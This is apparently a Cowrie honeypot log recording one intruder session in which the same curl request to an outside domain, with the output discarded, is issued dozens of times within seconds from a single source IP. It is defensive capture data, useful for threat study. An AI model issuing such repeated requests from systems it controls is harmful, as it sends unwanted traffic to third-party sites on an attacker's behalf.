{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.235910Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.273008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.274042Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.311179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.312354Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.359667Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.361121Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.397766Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.398855Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.435760Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.436802Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.473525Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.474913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.511794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.512998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.555616Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.556674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.596662Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.597842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.635148Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.636507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.675623Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.676689Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.713387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.714438Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.765894Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.767174Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.817930Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.819045Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.860372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.861443Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.898437Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.899520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.937336Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.938491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.982089Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.983218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.020788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.022006Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.075044Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.076212Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.124783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.125989Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.168945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.170116Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.222484Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.223814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.261018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.262055Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.301819Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.302926Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.341168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.342593Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.379871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.381065Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.418247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.419331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.455871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.457208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.493685Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.494795Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.541408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.542535Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.580396Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.581433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.628938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.629994Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.672957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.674022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.710922Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.712085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.752779Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.753837Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.797110Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.798192Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.838727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.839735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.876472Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.877456Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.914495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.915966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:14.952843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:14.954163Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.001119Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.002355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.052914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.054341Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.091333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.092402Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.130705Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.131677Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.171269Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.172597Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.263144Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.264180Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.306233Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.307271Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.345919Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.348153Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.385440Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.386452Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.425389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.426448Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.466179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.467516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.518552Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.519643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.558531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.559642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.597505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.598953Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.637668Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.638895Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.747968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.749073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.786937Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.788267Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.826765Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.827928Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.875709Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.876759Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.920626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.922196Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:15.970326Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:15.971679Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.028831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.029995Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.074775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.076103Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.124227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
